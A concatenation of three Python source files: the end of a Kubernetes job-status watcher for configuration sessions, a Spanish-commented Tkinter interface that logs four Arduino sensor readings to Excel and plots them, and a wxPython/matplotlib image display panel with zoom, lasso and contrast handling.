if job.status.completion_time:
LOGGER.info("EVENT: JobComplete %s", session_name)
completion_time = job.status.completion_time.isoformat().split('+')[0]
cfs_sessions.update_session_status(session_name,
data={'status': 'complete',
'succeeded': 'true',
'completionTime': completion_time})
return True
elif job.status.failed:
LOGGER.info("EVENT: JobFail %s", session_name)
completion_time = job.status.conditions[0].last_transition_time
completion_time = completion_time.isoformat().split('+')[0]
cfs_sessions.update_session_status(session_name,
data={'status': 'complete',
'succeeded': 'false',
'completionTime': completion_time})
return True
return False
def _session_missing(self, session_name):
try:
cfs_sessions.get_session(session_name)
except HTTPError as e:
if e.response.status_code == 404:
return True
return False
def get_session_jobs(self, sessions):
jobs = []
for session in sessions:
job_name = session['status']['session'].get('job')
if job_name:
jobs.append(job_name)
return jobs
def get_jobs(self):
jobs = k8s_jobs.list_namespaced_job(self.namespace,
label_selector='app.kubernetes.io/name=cray-cfs-aee')
job_names = [job.metadata.name for job in jobs.items]
return job_names
def delete_job(self, job_name):
k8s_jobs.delete_namespaced_job(job_name, self.namespace)
|
ui.py | from ctypes import sizeof
from logging import disable
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
from tkinter.font import Font
from datetime import date
from datetime import datetime as dtime
from openpyxl import load_workbook
from openpyxl.utils import *
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
from matplotlib.backend_bases import key_press_handler
from matplotlib.figure import Figure
from openpyxl.workbook.workbook import Workbook
import serial.tools.list_ports
import serial
from threading import *
import time
import numpy as np
#Crea Objeto de comunicacion self.serial (para conectar con Arduino), lo llamamos: self.ser
ser = serial.Serial(baudrate=115200, timeout=2)
#Creamos clase para Objeto que genera y maneja la UI (Interfaz de Usuario) y su funcionalidad.
class UI:
#Inicializa el objeto, requiere una hoja de excel como argumento.
def __init__(self, master, wb, ser):
#Crea variable interna para controlar el libro y la hoja de excel.
self.wb = wb
self.sheet = self.wb.active
#Crea variable interna para Objeto Serial. Crea variable para el root de TKInter y asigna titulo.
self.ser = ser
self.master = master
self.master.title("Interfaz")
#Crea un contenedor para la pagina principal (Frame).
self.First = Frame(self.master)
#Crea y configura contenedor para sensores.
Top = LabelFrame(self.First, text="Lectura de sensores", bd=2)
Top.grid(columnspan=5, padx=10, pady=15, ipadx=2, ipady=2)
#Crea figura para contener las graficas.
self.fig = Figure(dpi= 50, facecolor='Black', constrained_layout=True)
#Crea y configura un area de dibujo de TKinter para contener la figura.
self.cs1 = FigureCanvasTkAgg(self.fig, master=Top)
self.cs1.draw()
self.cs1.get_tk_widget().grid(row=0, column=1, rowspan=4, sticky=E)
#Crea y configura Labels para contener el valor actual.
self.sLabel1 = Label(Top, text="grados", font=("Verdana",14))
self.sLabel1.grid(row=0, column=3, sticky=E, pady=4, padx=5)
self.sLabel2 = Label(Top, text="grados", font=("Verdana",14))
self.sLabel2.grid(row=1, column=3, sticky=E, pady=4, padx=5)
self.sLabel3 = Label(Top, text="grados", font=("Verdana",14))
self.sLabel3.grid(row=2, column=3, sticky=E, pady=4, padx=5)
self.sLabel4 = Label(Top, text="grados", font=("Verdana",14))
self.sLabel4.grid(row=3, column=3, sticky=E, pady=4, padx=5)
#Crea Etiquetas para identificar las graficas.
ls1 = Label(Top, text="Sensor 1", font=("Verdana",18))
ls1.grid(row=0, column=0, sticky=E, pady=4, padx=5)
#Crea y define Boton para el Sensor 2.
ls2 = Label(Top, text="Sensor 2", font=("Verdana",18))
ls2.grid(row=1, column=0, sticky=E, pady=4, padx=5)
#Crea y define Boton para el Sensor 3.
ls3 = Label(Top, text="Sensor 3", font=("Verdana",18))
ls3.grid(row=2, column=0, sticky=E, pady=4, padx=5)
#Crea y define Boton para el Sensor 4.
ls4 = Label(Top, text="Sensor 4", font=("Verdana",18))
ls4.grid(row=3, column=0, sticky=E, pady=4, padx=5)
#Crea y define texto y dropdown menu del contador de minutos.
lsample = Label(self.First, text="Tiempo de muestreo", highlightthickness=0)
lsample.grid(row=1, column=0)
self.spin = Spinbox(self.First, from_= 0, to = 60, wrap = True, width=2, highlightthickness=0, border=0, font=Font(family='Helvetica', size=9, weight='normal'))
self.spin.delete(0,"end")
self.spin.insert(0,5)
self.spin.grid(row=1,column=1, sticky=W)
lmin = Label(self.First, text="minutos", highlightthickness=0)
lmin.grid(row=1, column=1)
#Crea y define Botones de funciones y manda llamar sus respectivas subrutinas.
self.breport = Button(self.First, text="Reporte", width=10, height=2, command= lambda : self.deactivate() & self.report())
self.breport.grid(row=2, column=0, padx=35, pady=10)
self.bstop = Button(self.First, text="Desconectar", width=10, height=2, command=self.ser.close())
self.bstop.grid(row=2, column=1, padx=55, pady=5)
self.bresume = Button(self.First, text="Continuar", width=10, height=2, command= lambda : self.deactivate() & self.connectSerial())
self.bresume.grid(row=2, column=2, padx=35, pady=5)
#Asigna contenedor a la pantalla principal (default).
self.First.grid()
#Funcion para generar reporte, crea un TopLevel (segunda pantalla que toma el frente cuando aparece)
#con las opciones para generar el reporte.
def report(self):
#Crea y define TopLevel y asigna a Root (Objeto), define en una estructura de grid.
self.Second = Toplevel(self.master)
#Crea Label Frame para contener parte de las opciones.
frame = LabelFrame(self.Second, text="Parametros de reporte")
frame.grid(row=0, column=0, columnspan=3, padx=15, pady=10)
#Crea y define el texto de las opciones.
flab = Label(frame, text="Desde: ")
flab.grid(row=1 , column=0, pady=0, padx=20)
tlab = Label(frame, text="hasta: ")
tlab.grid(row=2 , column=0, pady=10, padx=20)
#Crea Objeto datetime (declarado en el header).
d = date.today()
#Asigna valores obtenidos del Objeto a las varibles internas declaradas en el main.
dia.set(d.day)
mes.set(d.month)
#La funcion ofrece 5 dias de reporte en modo por defecto, en caso de que la diferencia de los
#dias incluya dos meses distintos esta condicion lo controla restando los dias predeterminados o
#agregandoselos a 25 (considerando un mes de 30 dias, 30-5+los dias del mes, ie: request en
#Febrero 3, 5 dias antes es 29 de Enero :. 30-5=25+3=28, el dia faltante se da porque por
#simplicidad se considera un mes de 30 dias).
if d.day > 5:
ddia.set(d.day-5)
mmes.set(d.month)
else:
ddia.set(25+d.day)
mmes.set(d.month-1)
anio.set(d.year)
#Crea y define Labels para texto de las opciones.
dlab = Label(frame, text="Dia")
dlab.grid(row=0, column=1, pady=2, padx=10)
mlab = Label(frame, text="Mes")
mlab.grid(row=0, column=2, pady=2, padx=10)
alab = Label(frame, text="Año")
alab.grid(row=0, column=3, pady=2, padx=10)
#Crea y define menus tipo Dropdown de la primera seccion con los valores predeterminados calculados arriba.
self.fdia = Spinbox(frame, from_= 0, to = 31, wrap = True, width=4, textvariable=ddia, font=Font(family='Helvetica', size=9, weight='normal'))
self.fdia.grid(row=1, column=1, pady=5, padx=10)
self.fmes = Spinbox(frame, from_= 0, to = 12, wrap = True, width=4, textvariable=mmes, font=Font(family='Helvetica', size=9, weight='normal'))
self.fmes.grid(row=1, column=2, pady=5)
self.fanio = Spinbox(frame, from_= 2021, to = 2022, wrap = True, width=4, textvariable=anio, font=Font(family='Helvetica', size=9, weight='normal'))
self.fanio.grid(row=1, column=3, pady=5, padx=10)
#Crea y define los menus de la segunda seccion.
self.sdia = Spinbox(frame, from_= 0, to = 31, wrap = True, width=4, textvariable=dia, font=Font(family='Helvetica', size=9, weight='normal'))
self.sdia.grid(row=2 , column=1, pady=5, padx=10)
self.smes = Spinbox(frame, from_= 0, to = 12, wrap = True, width=4, textvariable=mes, font=Font(family='Helvetica', size=9, weight='normal'))
self.smes.grid(row=2 , column=2, pady=5)
self.sanio = Spinbox(frame, from_= 2021, to = 2022, wrap = True, width=4, textvariable=anio, font=Font(family='Helvetica', size=9, weight='normal'))
self.sanio.grid(row=2 , column=3, pady=5, padx=10)
#Crea y define Botones para cancelar o exportar reporte.
gen = Button(self.Second, text="Generar", width=10, height=2, command= lambda : self.generate() & self.Second.destroy())
gen.grid(row=2, column=0, padx=10, pady=10)
cancel = Button(self.Second, text="Cancelar", width=10, height=2, command= lambda : self.activate() & self.Second.destroy())
cancel.grid(row=2, column=2, padx=20, pady=5)
self.Second.grid()
#F
def generate(self):
self.activate()
repBook = Workbook()
currentSheet = repBook.active
for row in self.sheet.values:
if row[0] == "Tiempo":
currentSheet.append(["Tiempo", "Sensor 1" , "Sensor 2" , "Sensor 3" , "Sensor 4" ])
else:
a = row[0].split()[0].split('-')
print(self.fmes.get())
if int(a[0]) < int(self.fanio.get())-2000:
pass
elif int(a[0]) > int(self.sanio.get())-2000:
break
elif int(a[1]) < int(self.fmes.get()):
pass
elif int(a[1]) > int(self.smes.get()):
break
elif int(a[2]) < int(self.fdia.get()):
pass
elif int(a[2]) > int(self.sdia.get()):
break
else:
currentSheet.append(row)
repBook.save("Reporte.xlsx")
#Funcion para leer de la hoja de excel que se paso como argumento para el Objeto.
def readFile(self):
#Obtiene y evalua (If) la respuesta de la funcion por errores.
info = self.requestData()
if info == 0 or info == None:
print("Error de respuesta")
#Agreaga un estampado de tiempo y los valores obtenidos de la funcion llamada.
else:
#Crea Objeto para contener el tiempo, crea una lista con el tiempo en formato y le concatena la respuesta.
d = dtime.now()
feta = ["{}".format(d.strftime("%y-%m-%d %H:%M:%S"))]
feta += info
#Agrega la linea a la hoja de excel, guarda los cambios del libro, llama funcion para graficar y threading.
self.sheet.append(feta)
self.wb.save("Hola.xlsx")
self.updateGraph()
self.threading()
#Funcion para establecer comunicacion con Arduino usando el Objeto de serial creado al inicio.
def connectSerial(self):
#Crea Toplevel y Label Frame para contener parte de las opciones.
self.ConnectWindow = Toplevel(self.master, height=500, width= 500)
frame = LabelFrame(self.ConnectWindow, text="Puertos disponibles")
frame.grid(row=0, column=0, columnspan=3, sticky=N+S+E+W, padx=15, pady=10)
#Cierra cualquier coneccion abierta para evitar problemas.
self.ser.close()
#Crea una lista de Python con el retorno de la funcion llamada, obtiene y almacena datos obtenidos.
ports = list(serial.tools.list_ports.comports())
self.items = StringVar()
self.portsDict = {x.description:x.name for x in ports}
self.items.set([x.description for x in ports])
#Crea Listbox para los puertos disponibles.
self.list = Listbox(frame, listvariable=self.items, width=35)
self.list.select_set(0)
self.list.grid(row=0, column=0, sticky=N+S+E+W, padx=15, pady=10)
#Crea Botones para controlar las funciones.
cncel = Button(self.ConnectWindow, text="Cancelar", width=10, height=2, command= lambda : self.activate() & self.ConnectWindow.destroy())
cncel.grid(row=1, column=0, padx=30, pady=10)
connect = Button(self.ConnectWindow, text="Connectar", width=10, height=2, command= lambda : self.activate() & self.Connect())
connect.grid(row=1, column=2, padx=30, pady=10)
#Configura el Toplevel en la pantalla.
self.ConnectWindow.grid()
#Funcion para connectarse al puerto seleccionado.
def Connect(self):
#Evalua si la seleccion actual esta vacia, si es valida abre el puerto con esa descripcion.
if self.list.get(ACTIVE) == None:
return
else:
self.ser.port=self.portsDict[self.list.get(ACTIVE)]
#Intenta abrir el puerto y validar el Arduino, de responder correctamente llama la subrutina y cierra la ventana.
try:
self.ser.open()
if self.validateSerial() < 0:
self.ConnectWindow.destroy()
raise Exception("Arduino no validado")
else:
messagebox.showinfo("Autentificacion satisfactoria","Mensaje de autentificacion validado correctamente")
self.ConnectWindow.destroy()
self.readFile()
#De no poder abrir el puerto crea mensaje de alerta y cierra la ventana.
except:
messagebox.showerror("Puerto Serial no reconocido", "El puerto seleccionado no produce respuesta de autentificacion")
self.ConnectWindow.destroy()
#Funcion para desactivar botones
def deactivate(self):
self.bresume['state'] = "disabled"
self.breport['state'] = "disabled"
#Funcion para activar botones
def activate(self):
self.bresume['state'] = "normal"
self.breport['state'] = "normal"
#Funcion para pedir informacion al Arduino.
def requestData(self):
#Limpia buffer, manda solicitud; lee y evalua respuesta, si es satiscatoria lee los datos y los regresa.
self.ser.write(b'R')
answer = self.ser.read().decode()
if answer == 'E':
data = [float(self.ser.readline().decode('UTF-8')[:-2]) for x in range(4)]
if "nan" in data:
return 0
return data
return 0
#Funcion para pedir autorizacion.
def validateSerial(self):
count = 0
#Limpia buffer, manda solicitud; lee, decodifica y evalua respuesta, si es satiscatoria retorna positivo.
while True:
ser.write(b'O')
data = ser.read().decode()
if data == 'K':
break
else:
if count >3:
return -1
return 1
#Funcion para comenzar Hilo de espera.
def threading(self):
#Crea Hilo con la funcion esperando el valor del spinbox por una constante, inicia el hilo.
self.t1=Thread(target=self.master.after(int(self.spin.get())*60000, self.readFile))
self.t1.start()
#Funcion para actualizar datos.
def updateGraph(self):
#Lee los ultimos 10 valores en cada columna de la hoja de excel (comprehension list).
self.sensor1 = [a.value for a in self.sheet['B'][-10:-1]]
self.sensor2 = [a.value for a in self.sheet['C'][-10:-1]]
self.sensor3 = [a.value for a in self.sheet['D'][-10:-1]]
self.sensor4 = [a.value for a in self.sheet['E'][-10:-1]]
#Limpia el contenedor de las graficas.
self.fig.clf()
#Agrega las graficas al contenedor, las dibuja y configura en la pantalla.
self.s1 = self.fig.add_subplot(4, 1, 1, frameon=False).plot([x for x in range(len(self.sensor1))], self.sensor1, 'b')
self.s2 = self.fig.add_subplot(4, 1, 2, frameon=False).plot([x for x in range(len(self.sensor2))], self.sensor2, 'r')
self.s3 = self.fig.add_subplot(4, 1, 3, frameon=False).plot([x for x in range(len(self.sensor3))], self.sensor3, 'g')
self.s4 = self.fig.add_subplot(4, 1, 4, frameon=False).plot([x for x in range(len(self.sensor4))], self.sensor4)
self.cs1.draw()
self.cs1.get_tk_widget().grid(row=0, column=1, rowspan=4, sticky=E)
#Actualiza valores en Labels.
self.sLabel1['text'] = str(self.sensor1[-1])+"*"
self.sLabel2['text'] = str(self.sensor2[-1])+"*"
self.sLabel3['text'] = str(self.sensor3[-1])+"*"
self.sLabel4['text'] = str(self.sensor4[-1])+"*"
root = Tk()
s1 = IntVar()
s1.set(True)
s2 = IntVar()
s2.set(True)
s3 = IntVar()
s3.set(True)
s4 = IntVar()
s4.set(True)
dia = IntVar()
ddia = IntVar()
mes = IntVar()
mmes = IntVar()
anio = IntVar()
wb = load_workbook(filename = 'hola.xlsx')
gui = UI(root, wb, ser)
root.mainloop() |
imagepanel.py | #!/usr/bin/python
##
## MPlot PlotPanel: a wx.Panel for 2D line plotting, using matplotlib
##
import sys
import time
import os
import wx
from threading import Thread
import numpy as np
import matplotlib
import matplotlib.cm as cmap
from matplotlib.figure import Figure
from matplotlib.gridspec import GridSpec
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg
from matplotlib.patches import Rectangle
from .imageconf import ImageConfig, RGB_COLORS
from .basepanel import BasePanel
from .utils import inside_poly, MenuItem
from .plotframe import PlotFrame
class ImagePanel(BasePanel):
"""
MatPlotlib Image as a wx.Panel, suitable for embedding
in any wx.Frame. This provides a right-click popup
menu for configuration, zoom by dragging, saving an image
figure, and Ctrl-C for copy-image-to-clipboard, customizations
of colormap, interpolation, and intesity scaling
For more features, see PlotFrame, which embeds a PlotPanel
and also provides, a Menu, StatusBar, and Printing support.
"""
def __init__(self, parent, messenger=None, data_callback=None,
cursor_callback=None, lasso_callback=None,
redraw_callback=None, zoom_callback=None,
contour_callback=None, size=(525, 450), dpi=100,
output_title='Image', **kws):
matplotlib.rc('lines', linewidth=2)
BasePanel.__init__(self, parent,
output_title=output_title,
messenger=messenger,
zoom_callback=zoom_callback, **kws)
self.conf = ImageConfig()
self.conf.title = output_title
self.cursor_mode = 'zoom'
self.data_callback = data_callback
self.cursor_callback = cursor_callback
self.lasso_callback = lasso_callback
self.contour_callback = contour_callback
self.redraw_callback = redraw_callback
self.slice_plotframe = None
self.win_config = None
self.size = size
self.dpi = dpi
self.user_limits = {}
self.scalebar_rect = self.scalerbar_text = None
self.BuildPanel()
@property
def xdata(self):
return self.conf.xdata
@xdata.setter
def xdata(self, value):
self.conf.xdata = value
@property
def ydata(self):
return self.conf.ydata
@ydata.setter
def ydata(self, value):
self.conf.ydata = value
def display(self, data, x=None, y=None, xlabel=None, ylabel=None,
style=None, nlevels=None, levels=None, contour_labels=None,
store_data=True, col=0, unzoom=True, show_axis=False,
auto_contrast=False, contrast_level=0, colormap=None, **kws):
"""
generic display, using imshow (default) or contour
"""
if style is not None:
self.conf.style = style
self.axes.cla()
conf = self.conf
conf.log_scale = False
conf.show_axis = show_axis
conf.highlight_areas = []
if 1 in data.shape:
data = data.squeeze()
self.data_range = [0, data.shape[1], 0, data.shape[0]]
if contrast_level not in (0, None):
conf.contrast_level = contrast_level
if auto_contrast:
conf.contrast_level = 1
if x is not None:
conf.xdata = np.array(x)
if conf.xdata.shape[0] != data.shape[1]:
conf.xdata = None
if y is not None:
conf.ydata = np.array(y)
if conf.ydata.shape[0] != data.shape[0]:
conf.ydata = None
if xlabel is not None:
conf.xlab = xlabel
if ylabel is not None:
conf.ylab = ylabel
if store_data:
conf.data = data
if self.conf.style == 'contour':
if levels is None:
levels = self.conf.ncontour_levels
else:
self.conf.ncontour_levels = levels
if nlevels is None:
nlevels = self.conf.ncontour_levels = 9
nlevels = max(2, nlevels)
if conf.contrast_level is not None:
contrast = [conf.contrast_level, 100.0-conf.contrast_level]
imin, imax = np.percentile(conf.data, contrast)
data = np.clip(conf.data, imin, imax)
clevels = np.linspace(data.min(), data.max(), nlevels+1)
self.conf.contour_levels = clevels
self.conf.image = self.axes.contourf(data, cmap=self.conf.cmap[col],
levels=clevels)
self.conf.contour = self.axes.contour(data, cmap=self.conf.cmap[col],
levels=clevels)
cmap_name = self.conf.cmap[col].name
xname = 'gray'
try:
if cmap_name == 'gray_r':
xname = 'Reds_r'
elif cmap_name == 'gray':
xname = 'Reds'
elif cmap_name.endswith('_r'):
xname = 'gray_r'
except:
pass
self.conf.contour.set_cmap(getattr(cmap, xname))
if contour_labels is None:
contour_labels = self.conf.contour_labels
if contour_labels:
nlog = np.log10(abs(clevels[1]-clevels[0]))
fmt = "%.4f"
if nlog < -2:
fmt = "%%.%df" % (1-nlog)
elif nlog > 2:
fmt = "%.1f"
self.axes.clabel(self.conf.contour, fontsize=10, inline=1, fmt=fmt)
if hasattr(self.contour_callback , '__call__'):
self.contour_callback(levels=clevels)
else:
if data.max() == data.min():
img = data
else:
img = (data - data.min()) /(1.0*data.max() - data.min())
if colormap is not None:
self.conf.set_colormap(colormap, icol=col)
self.conf.image = self.axes.imshow(img, cmap=self.conf.cmap[col],
interpolation=self.conf.interp)
self.autoset_margins()
if unzoom:
self.unzoom_all()
if hasattr(self.data_callback, '__call__'):
self.data_callback(data, x=x, y=y, **kws)
self.conf.indices = None
self.indices_thread = Thread(target=self.calc_indices, args=(data.shape, ))
self.indices_thread.start()
def update_image(self, data):
"""
update image on panel, as quickly as possible
"""
if 1 in data.shape:
data = data.squeeze()
if self.conf.contrast_level is not None:
clevels = [self.conf.contrast_level, 100.0-self.conf.contrast_level]
imin, imax = np.percentile(data, clevels)
data = np.clip((data - imin)/(imax - imin + 1.e-8), 0, 1)
self.axes.images[0].set_data(data)
self.canvas.draw()
def autoset_margins(self):
"""auto-set margins left, bottom, right, top
according to the specified margins (in pixels)
and axes extent (taking into account labels,
title, axis)
"""
if self.conf.show_axis:
self.axes.set_axis_on()
if self.conf.show_grid:
self.axes.grid(True,
alpha=self.conf.grid_alpha,
color=self.conf.grid_color)
else:
self.axes.grid(False)
self.conf.set_formatters()
l, t, r, b = 0.08, 0.96, 0.96, 0.08
if self.conf.xlab is not None:
self.axes.set_xlabel(self.conf.xlab)
b, t = 0.11, 0.96
if self.conf.ylab is not None:
self.axes.set_ylabel(self.conf.ylab)
l, r = 0.11, 0.96
else:
self.axes.set_axis_off()
l, t, r, b = 0.01, 0.99, 0.99, 0.01
self.gridspec.update(left=l, top=t, right=r, bottom=b)
for ax in self.fig.get_axes():
ax.update_params()
ax.set_position(ax.figbox)
def add_highlight_area(self, mask, label=None, col=0):
"""add a highlighted area -- outline an arbitrarily shape --
as if drawn from a Lasso event.
This takes a mask, which should be a boolean array of the
same shape as the image.
"""
patch = mask * np.ones(mask.shape) * 0.9
cmap = self.conf.cmap[col]
area = self.axes.contour(patch, cmap=cmap, levels=[0, 1])
self.conf.highlight_areas.append(area)
col = None
if hasattr(cmap, '_lut'):
rgb = [int(i*240)^255 for i in cmap._lut[0][:3]]
col = '#%02x%02x%02x' % (rgb[0], rgb[1], rgb[2])
if label is not None:
def fmt(*args, **kws): return label
self.axes.clabel(area, fontsize=9, fmt=fmt,
colors=col, rightside_up=True)
if col is not None:
for l in area.collections:
l.set_color(col)
self.canvas.draw()
def set_viewlimits(self, axes=None):
""" update xy limits of a plot"""
if axes is None:
axes = self.axes
xmin, xmax, ymin, ymax = self.data_range
if len(self.conf.zoom_lims) >1:
zlims = self.conf.zoom_lims[-1]
if axes in zlims:
xmin, xmax, ymin, ymax = zlims[axes]
xmin = max(self.data_range[0], xmin)
xmax = min(self.data_range[1], xmax)
ymin = max(self.data_range[2], ymin)
ymax = min(self.data_range[3], ymax)
if (xmax < self.data_range[0] or
xmin > self.data_range[1] or
ymax < self.data_range[2] or
ymin > self.data_range[3] ):
self.conf.zoom_lims.pop()
return
if abs(xmax-xmin) < 2:
xmin = int(0.5*(xmax+xmin) - 1)
xmax = xmin + 2
if abs(ymax-ymin) < 2:
ymin = int(0.5*(ymax+xmin) - 1)
ymax = ymin + 2
self.axes.set_xlim((xmin, xmax),emit=True)
self.axes.set_ylim((ymin, ymax),emit=True)
self.axes.update_datalim(((xmin, ymin), (xmax, ymax)))
self.conf.datalimits = [xmin, xmax, ymin, ymax]
self.conf.reset_formats()
self.redraw()
def clear(self):
""" clear plot """
self.axes.cla()
self.conf.title = ''
####
## create GUI
####
def BuildPanel(self):
""" builds basic GUI panel and popup menu"""
figsize = (1.0*self.size[0]/self.dpi, 1.0*self.size[1]/self.dpi)
self.fig = Figure(figsize, dpi=self.dpi)
self.gridspec = GridSpec(1,1)
self.axes = self.fig.add_subplot(self.gridspec[0],
facecolor='#FFFFFD')
self.canvas = FigureCanvasWxAgg(self, -1, self.fig)
self.conf.axes = self.axes
self.conf.fig = self.fig
self.conf.canvas= self.canvas
# self.canvas.SetCursor(wx.StockCursor(wx.CURSOR_ARROW))
# This way of adding to sizer allows resizing
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.Add(self.canvas, 1, wx.ALL|wx.GROW)
self.SetSizer(sizer)
self.Fit()
self.addCanvasEvents()
def BuildPopup(self):
# build pop-up menu for right-click display
self.popup_menu = popup = wx.Menu()
MenuItem(self, popup, 'Zoom out', '', self.unzoom)
MenuItem(self, popup, 'Zoom all the way out', '', self.unzoom_all)
self.popup_menu.AppendSeparator()
MenuItem(self, popup, 'Rotate 90deg (CW)', '', self.rotate90)
MenuItem(self, popup, 'Save Image', '', self.save_figure)
def rotate90(self, event=None, display=True):
"rotate 90 degrees, CW"
self.conf.rotate90()
if display:
conf = self.conf
self.display(conf.data, x=conf.xdata, y=conf.ydata,
xlabel=conf.xlab, ylabel=conf.ylab,
show_axis=conf.show_axis,
levels=conf.ncontour_levels)
def flip_horiz(self):
self.conf.flip_horiz()
def flip_vert(self):
self.conf.flip_vert()
def restore_flips_rotations(self):
"restore flips and rotations"
conf = self.conf
if conf.flip_lr:
self.flip_horiz()
if conf.flip_ud:
self.flip_vert()
if conf.rot_level != 0:
for i in range(4-conf.rot_level):
self.rotate90(display=False)
self.display(conf.data, x=conf.xdata, y=conf.ydata,
xlabel=conf.xlab, ylabel=conf.ylab,
show_axis=conf.show_axis)
def toggle_curmode(self, event=None):
"toggle cursor mode"
if self.cursor_mode == 'zoom':
self.cursor_mode = 'lasso'
else:
self.cursor_mode = 'zoom'
####
## GUI events, overriding BasePanel components
####
def calc_indices(self, shape):
"""calculates and stores the set of indices
ix=[0, nx-1], iy=[0, ny-1] for data of shape (nx, ny)"""
if len(shape) == 2:
ny, nx = shape
elif len(shape) == 3:
ny, nx, nchan = shape
inds = []
for iy in range(ny):
inds.extend([(ix, iy) for ix in range(nx)])
self.conf.indices = np.array(inds)
def lassoHandler(self, vertices):
if self.conf.indices is None or self.indices_thread.is_alive():
self.indices_thread.join()
ind = self.conf.indices
mask = inside_poly(vertices,ind)
mask.shape = (self.conf.data.shape[0], self.conf.data.shape[1])
self.lasso = None
self.canvas.draw()
if hasattr(self.lasso_callback , '__call__'):
self.lasso_callback(mask=mask)
def unzoom(self, event=None, set_bounds=True):
""" zoom out 1 level, or to full data range """
lims = None
if len(self.conf.zoom_lims) > 1:
lims = self.conf.zoom_lims.pop()
ax = self.axes
if lims is None: # auto scale
self.conf.zoom_lims = [None]
xmin, xmax, ymin, ymax = self.data_range
lims = {self.axes: [xmin, xmax, ymin, ymax]}
self.set_viewlimits()
self.canvas.draw()
def zoom_leftup(self, event=None):
"""leftup event handler for zoom mode in images"""
if self.zoom_ini is None:
return
ini_x, ini_y, ini_xd, ini_yd = self.zoom_ini
try:
dx = abs(ini_x - event.x)
dy = abs(ini_y - event.y)
except:
dx, dy = 0, 0
t0 = time.time()
self.rbbox = None
self.zoom_ini = None
if (dx > 3) and (dy > 3) and (t0-self.mouse_uptime)>0.1:
self.mouse_uptime = t0
zlims, tlims = {}, {}
ax = self.axes
xmin, xmax = ax.get_xlim()
ymin, ymax = ax.get_ylim()
zlims[ax] = [xmin, xmax, ymin, ymax]
if len(self.conf.zoom_lims) == 0:
self.conf.zoom_lims.append(zlims)
ax_inv = ax.transData.inverted
try:
x1, y1 = ax_inv().transform((event.x, event.y))
except:
x1, y1 = self.x_lastmove, self.y_lastmove
try:
x0, y0 = ax_inv().transform((ini_x, ini_y))
except:
x0, y0 = ini_xd, ini_yd
tlims[ax] = [int(round(min(x0, x1))), int(round(max(x0, x1))),
int(round(min(y0, y1))), int(round(max(y0, y1)))]
self.conf.zoom_lims.append(tlims)
# now apply limits:
self.set_viewlimits()
if callable(self.zoom_callback):
self.zoom_callback(wid=self.GetId(), limits=tlims[ax])
def unzoom_all(self, event=None):
""" zoom out full data range """
self.conf.zoom_lims = [None]
self.unzoom(event)
def redraw(self, col=0):
"""redraw image, applying
- log scaling,
- max/min values from sliders or explicit intensity ranges
- color map
- interpolation
"""
conf = self.conf
img = conf.data
if img is None: return
if len(img.shape) == 2:
col = 0
if self.conf.style == 'image':
if conf.log_scale:
img = np.log10(1 + 9.0*img)
# apply intensity scale for current limited (zoomed) image
if len(img.shape) == 2:
# apply clipped color scale, as from sliders
imin = float(conf.int_lo[col])
imax = float(conf.int_hi[col])
if conf.log_scale:
imin = np.log10(1 + 9.0*imin)
imax = np.log10(1 + 9.0*imax)
(xmin, xmax, ymin, ymax) = self.conf.datalimits
if xmin is None: xmin = 0
if xmax is None: xmax = img.shape[1]
if ymin is None: ymin = 0
if ymax is None: ymax = img.shape[0]
img = (img - imin)/(imax - imin + 1.e-8)
mlo = conf.cmap_lo[0]/(1.0*conf.cmap_range)
mhi = conf.cmap_hi[0]/(1.0*conf.cmap_range)
if self.conf.style == 'image':
conf.image.set_data(np.clip((img - mlo)/(mhi - mlo + 1.e-8), 0, 1))
conf.image.set_interpolation(conf.interp)
else:
r, g, b = img[:,:,0], img[:,:,1], img[:,:,2]
rmin = float(conf.int_lo[0])
rmax = float(conf.int_hi[0])
gmin = float(conf.int_lo[1])
gmax = float(conf.int_hi[1])
bmin = float(conf.int_lo[2])
bmax = float(conf.int_hi[2])
if conf.log_scale:
rmin = np.log10(1 + 9.0*rmin)
rmax = np.log10(1 + 9.0*rmax)
gmin = np.log10(1 + 9.0*gmin)
gmax = np.log10(1 + 9.0*gmax)
bmin = np.log10(1 + 9.0*bmin)
bmax = np.log10(1 + 9.0*bmax)
rlo = conf.cmap_lo[0]/(1.0*conf.cmap_range)
rhi = conf.cmap_hi[0]/(1.0*conf.cmap_range)
glo = conf.cmap_lo[1]/(1.0*conf.cmap_range)
ghi = conf.cmap_hi[1]/(1.0*conf.cmap_range)
blo = conf.cmap_lo[2]/(1.0*conf.cmap_range)
bhi = conf.cmap_hi[2]/(1.0*conf.cmap_range)
r = (r - rmin)/(rmax - rmin + 1.e-8)
g = (g - gmin)/(gmax - gmin + 1.e-8)
b = (b - bmin)/(bmax - bmin + 1.e-8)
inew = img*1.0
inew[:,:,0] = np.clip((r - rlo)/(rhi - rlo + 1.e-8), 0, 1)
inew[:,:,1] = np.clip((g - glo)/(ghi - glo + 1.e-8), 0, 1)
inew[:,:,2] = np.clip((b - blo)/(bhi - blo + 1.e-8), 0, 1)
whitebg = conf.tricolor_bg.startswith('wh')
if whitebg:
inew = conf.tricolor_white_bg(inew)
if self.conf.style == 'image':
conf.image.set_data(inew)
conf.image.set_interpolation(conf.interp)
try:
self.scalebar_rect.remove()
except:
pass
try:
self.scalebar_text.remove()
except:
pass
if conf.scalebar_show:
ystep, xstep = conf.scalebar_pixelsize
if xstep is None or ystep is None:
ystep, xstep = 1, 1
if conf.xdata is not None:
xstep = abs(np.diff(conf.xdata).mean())
if conf.ydata is not None:
ystep = abs(np.diff(conf.ydata).mean())
self.scalebar_pixelsize = ystep, xstep
y, x = conf.scalebar_pos
y, x = int(y), int(x)
h, w = conf.scalebar_size
h, w = int(h), int(w/xstep)
col = conf.scalebar_color
self.scalebar_rect = Rectangle((x, y), w, h,linewidth=1, edgecolor=col,
facecolor=col)
self.axes.add_patch(self.scalebar_rect)
if conf.scalebar_showlabel:
x = int(x + w/4)
y = y - 3*h
self.scalebar_text = self.axes.text(x, y, conf.scalebar_label,
color=col)
self.canvas.draw()
if callable(self.redraw_callback):
self.redraw_callback(wid=self.GetId())
def report_motion(self, event=None):
if event.inaxes is None:
return
fmt = "X,Y= %g, %g"
x, y = event.xdata, event.ydata
if len(self.fig.get_axes()) > 1:
try:
x, y = self.axes.transData.inverted().transform((x, y))
except:
pass
if self.motion_sbar is None:
try:
self.motion_sbar = self.nstatusbar-1
except AttributeError:
self.motion_sbar = 1
self.write_message(fmt % (x, y), panel=self.motion_sbar)
conf = self.conf
